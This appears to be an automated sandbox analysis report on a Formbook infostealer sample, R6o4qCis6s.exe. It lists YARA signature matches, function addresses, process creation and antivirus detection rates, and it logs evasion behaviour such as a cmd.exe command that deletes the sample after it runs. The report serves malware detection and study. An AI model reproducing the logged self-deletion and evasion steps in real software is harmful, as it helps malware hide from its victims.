00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by 
yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought 
to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 0_2_0040C340
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00452DE0 0_2_00452DE0
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC 0_2_0044D1BC
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046724C 0_2_0046724C
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 1_2_00401026
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401030 1_2_00401030
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041DA67 1_2_0041DA67
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041D4F2 1_2_0041D4F2
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4F7 1_2_0041E4F7
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4FA 1_2_0041E4FA
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D87 1_2_00402D87
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D90 1_2_00402D90
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409E20 1_2_00409E20
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041CEE3 1_2_0041CEE3
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E764 1_2_0041E764
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402FB0 1_2_00402FB0
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B090 1_2_00A0B090
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1002 1_2_00AB1002
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 1_2_00A14120
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF900 1_2_009FF900
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2EBB0 1_2_00A2EBB0
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0841F 1_2_00A0841F
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 1_2_00A0D5E0
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F0D20 1_2_009F0D20
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1D55 1_2_00AC1D55
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A16E30 1_2_00A16E30
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B090 5_2_0483B090
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 5_2_048520A0
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F20A8 5_2_048F20A8
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F28EC 5_2_048F28EC
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1002 5_2_048E1002
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483841F 5_2_0483841F
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048ED466 5_2_048ED466
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 5_2_04852581
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F25DD 5_2_048F25DD
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 5_2_0483D5E0
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F900 5_2_0482F900
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2D07 5_2_048F2D07
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04820D20 5_2_04820D20
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 5_2_04844120
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1D55 5_2_048F1D55
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F22AE 5_2_048F22AE
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2EF7 5_2_048F2EF7
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04846E30 5_2_04846E30
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485EBB0 5_2_0485EBB0
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EDBD2 5_2_048EDBD2
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1FF1 5_2_048F1FF1
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2B28 5_2_048F2B28
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4F7 5_2_0023E4F7
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4FA 5_2_0023E4FA
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D87 5_2_00222D87
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D90 5_2_00222D90
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00229E20 5_2_00229E20
 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222FB0 5_2_00222FB0
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0482B150 appears 35 times
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 009FB150 appears 32 times
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 00406A94 appears 57 times
 PE file contains strange resources
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info
 Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe
 Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe
 Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
 Contains functionality for error logging
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421830 GetLastError,FormatMessageA, 0_2_00421830
 Contains functionality to check free disk space
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408E98 GetDiskFreeSpaceA, 0_2_00408E98
 Contains functionality to load and extract PE file embedded resources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004146E8 FindResourceA, 0_2_004146E8
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
 Launches a second explorer.exe instance
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
 Parts of this application are using Borland Delphi (probably coded in Delphi)
 Reads the hosts file
 Sample is known by Antivirus
 Source: R6o4qCis6s.exe Virustotal: Detection: 77%
 Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
 Spawns processes
 Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Uses an in-process (OLE) Automation server
 Writes ini files
 Checks if Microsoft Office is installed